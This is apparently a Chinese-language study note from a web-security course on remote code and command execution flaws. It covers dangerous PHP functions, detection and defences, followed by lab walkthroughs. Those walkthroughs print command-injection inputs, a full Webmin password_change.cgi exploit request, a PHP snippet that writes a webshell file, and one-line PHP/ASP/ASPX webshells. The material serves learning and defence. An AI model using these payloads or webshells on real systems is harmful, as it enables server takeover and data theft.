30：WEB漏洞-RCE代码及命令执行漏洞

参考文章：https://www.cnblogs.com/zhengna/p/15775737.html
本文为博主学习复现笔记

思维导图

RCE(remote code/command execute) 远程代码/命令执行漏洞

产生原理：

在 Web 应用中有时候程序员为了考虑灵活性、简洁性，会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时，没有考虑用户是否能控制这个字符串，将造成代码执行漏洞。同样调用系统命令处理，将造成命令执行漏洞。

漏洞形成条件：可控变量&漏洞函数

漏洞函数：几种常用语言，都有将字符串转化成代码去执行的相关函数。

RCE漏洞危害

1、执行系统命令(Windows：DOS命令、linux)

2、执行脚本代码(php、java、python)

1.代码执行演示

test.php脚本代码

eval()函数会将传入的字符串当做代码来执行，若传入phpinfo();则会执行，显示如下

传入echo 123;也会执行，显示123

发现漏洞后，后续攻击可以执行一段代码，执行写入文件、读取文件等操作。

写入一句话

$a=fopen("myqf.php","w");
echo fwrite($a,"一句话木马");
fclose($a);

成功写入进去

2.命令执行演示

test.php脚本代码

system()函数会执行外部命令，若传入ipconfig则会执行，显示如下

脚本代码

1.php：

代码执行函数：

• 1- eval()（特别注意：php中@符号的意思是不报错，即使执行错误，也不报错。）
• 2- assert()
• 3- call_user_func()
• 4- create_function()
• 5- array_map()
• 6- call_user_func_array()
• 7- array_filter()
• 8- uasort()函数
• 9- preg_replace()

命令执行函数：

• 1- system()
• 2-passthru()
• 3- exec()
• 4- pcntl_exec()
• 5- shell_exec()
• 6- popen()/proc_open()
• 7- 反引号 ``

2.Python：exec等

3.java

Java：Java中没有类似php中的eval函数这种直接可以将字符串转化成代码去执行的函数，但是有反射机制，并期望有各种基于反射机制的表达式引擎，如OGNL、SpEL等。

代码/命令执行漏洞的查找：

• 1.代码审计，比如网站使用开源CMS，则可以去网上搜索源代码审计。推荐站长之家：https://down.chinaz.com/
• 2.漏洞工具扫描
• 3.搜索引擎搜索公开漏洞
• 4.手工查看参数值和功能点判断（参数值和脚本有关，如test.php?x=echo 等等）

漏洞检测

白盒测试：代码审计
黑盒测试：
1、漏洞工具–OpenVAS、Nessus等
2、公开漏洞–寻找类似目标网站的公开漏洞
3、手工看参数值及功能点–判定参数值的数据是否和代码相关

相关防御

1、变量过滤或固定
2、禁用敏感函数
3、WAF产品防护

命令执行的防御方法

1.在PHP下禁用高危系统函数
找到php.ini，查找到disable_functions，添加禁用的函数名
2.参数的值尽量使用引号包括，并在拼接前调用addslashes进行转义
3.不执行外部的应用程序或命令
尽量使用自定义函数或函数库实现外部应用程序或命令的功能。在执行system、eval等命令执行功能的函数前，要确认参数内容
4.使用escapeshellarg函数处理相关参数
escapeshellarg函数会将用户引起参数或命令结束的字符进行转义，如单引号"’“会被转义为”\’"，双引号“””会被转义为"""，分号";“会被转义为”;"，这样escapeshellarg会将参数内容限制在一对单引号或双引号里面，转义参数中包括的单引号或双引号，使其无法对当前执行进行截断，实现防范命令注入攻击的目的
5.使用safe_mode_exec_dir指定可执行的文件路径
将php.ini文件中的safe_mode设置为On，然后将允许执行的文件放入一个目录，并使用safe_mode_exec_dir指定这个可执行的文件路径；这样，在需要执行相应的外部程序时，程序必须在safe_mode_exec_dir指定的目录中才会允许执行，否则执行将失败

代码执行的防御方法

1、使用json保存数组，当读取时就不需要使用eval了
2、对于必须使用eval的地方，一定严格处理用户数据（白名单、黑名单）
3、字符串使用单引号包括可控代码，插入前使用addslashes转义（addslashes、魔数引号、htmlspecialchars、 htmlentities、mysql_real_escape_string）
4、放弃使用preg_replace的e修饰符，使用preg_replace_callback()替换（preg_replace_callback()）
5、若必须使用preg_replace的e修饰符，则必用单引号包裹正则匹配出的对象（preg_replace+正则）

本课重点案例：

• 案例1：墨者靶场黑盒功能点命令执行-应用功能
• 案例2：墨者靶场白盒代码及命令执行-代码分析
• 案例3：墨者靶场黑盒层RCE漏洞检测-公开漏洞
• 案例4：Javaweb-Struts2框架类RCE漏洞-漏洞层面
• 案例5：一句话Webshell后门原理代码-拓展说明

案例1：墨者靶场黑盒功能点命令执行-应用功能

墨者学院-命令注入执行分析：https://www.mozhe.cn/bug/detail/12

<1>首页打开，输入127.0.0.1，显示Ping的结果，猜测这里可能有命令执行漏洞。

<2>输入127.0.0.1|ls，尝试执行ls命令，发现报错“IP格式不正确”。（这里使用了linux命令中的管道符）

<3>经过分析，发现是前端代码校验IP格式，可以采用禁用本地JS或者抓包的形式绕过。
我采用抓包

<4>下面直接抓包绕过

首先找到flag文件

然后读取flag文件

本关主要是在不知道代码的情况下，通过网站功能点，盲猜有漏洞，并进行黑盒测试。

案例2：墨者靶场白盒代码及命令执行-代码分析

墨者学院-PHP代码分析溯源(第4题)：https://www.mozhe.cn/bug/detail/13

<1>首页打开发现提示key在根目录，且给出代码。

<?
php eval (gzinflate( base64_decode (&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&))); 
?>

<2>这是base64加密+压缩的编码。简单方法就是直接把eval改成echo输出，执行

<?php
echo gzinflate(base64_decode('40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA=='));
?>

得到echo $_REQUEST[a];; ?>，发现有命令执行漏洞
https://tool.lu/coderunner/

发现是用a来接收传参数

<3>直接给a传入 ls，显示所有文件。发现key文件。

<4>尝试读取key文件，直接用cat读取得到key（需要在源代码中查看），或者使用tac命令读取key（可以在页面直接显示）。

用cat / tac 查看 key

http://219.153.49.228:44533/f.php?a=cat key_181541630618021.php

http://219.153.49.228:44533/f.php?a=tac key_181541630618021.php

案例3：墨者靶场黑盒层RCE漏洞检测-公开漏洞

墨者学院-Webmin未经身份验证的远程代码执行：https://www.mozhe.cn/bug/detail/309

Webmin是用于类似Unix的系统的基于Web的系统配置工具。该漏洞存在于密码重置页面中，该页面允许未经身份验证的用户通过简单的POST请求执行任意命令。

没墨币，直接本地vulhub 来复现！

<1>打开页面如下

<2>直接网上搜索webmin漏洞，找到远程代码执行的EXP：

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|ls&new1=test2&new2=test2

<3>尝试登录，抓包，将url和参数改为EXP，由于key在根目录下，我们直接“ls /”查看根目录下文件，找到key文件

<4>读取key文件：cat /key.txt

该漏洞利用条件：

1. 系统开启密码修改功能
2. 存在此漏洞的版本1.882-1.920

修复建议：

1. 升级版本
2. 在版本1.900到1.920中编辑/etc/webmin/miniserv.conf，删除passwd_mode =行，然后运行/ etc / webmin / restart，以免系统受到攻击。

案例4：Javaweb-Struts2框架类RCE漏洞-漏洞层面

墨者学院-Apache Struts2远程代码执行漏洞(S2-016)复现：https://www.mozhe.cn/bug/detail/254

S2-016：由于通过操作前缀为“action”/“redirect”/“redirectAction”的参数引入的漏洞。

使用工具直接检测，居然没有发现S2-016，看到有S2-046就直接利用了。

ls找到key文件

cat查看key文件内容

墨者学院-Apache Struts2远程代码执行漏洞(S2-037)复现：https://www.mozhe.cn/bug/detail/262

直接网上搜索EXP利用

ls找到key文件

cat key.txt查看内容

案例5：一句话Webshell后门原理代码-拓展说明

常见的一句话木马：

php的一句话木马： 
<?php @ eval ( $_POST [ 'pass' ]);?> 
asp的一句话木马：  
<% eval request ( "pass" )%> 
aspx的一句话木马： 
<%@ Page Language= "Jscript" %> 
<% eval (Request.Item[ "pass" ], "unsafe" );%>

一句话木马的本质是向服务器写入了一个代码文件，而这个代码存在代码执行漏洞。

而菜刀的原理是，提前写好了各种脚本，利用一句话木马中的代码执行漏洞，实现对服务器的增删改查。

用WSExplorer 对菜刀进行流量分析

其他涉及资源：

• JAVA web网站代码审计－－入门：https://www.cnblogs.com/ermei/p/6689005.html
• http://leanote.com/post/snowming/9da184ef24bd
• https://www.cnblogs.com/-qing-/p/10819069.html
• https://www.mozhe.cn/bug/detail/RWpnQUllbmNaQUVndTFDWGxaL0JjUT09bW96aGUmozhe 命令注入执行分析

https://www.mozhe.cn/bug/detail/T0YyUmZRa1paTkJNQ0JmVWt3Sm13dz09bW96aGUmozhe PHP代码分析溯源

https://www.mozhe.cn/bug/detail/d01lL2RSbGEwZUNTeThVZ0xDdXl0Zz09bW96aGUmozhe Webmin未经身份验证的远程代码执行

https://blog.csdn.net/LYJ20010728/article/details/117349106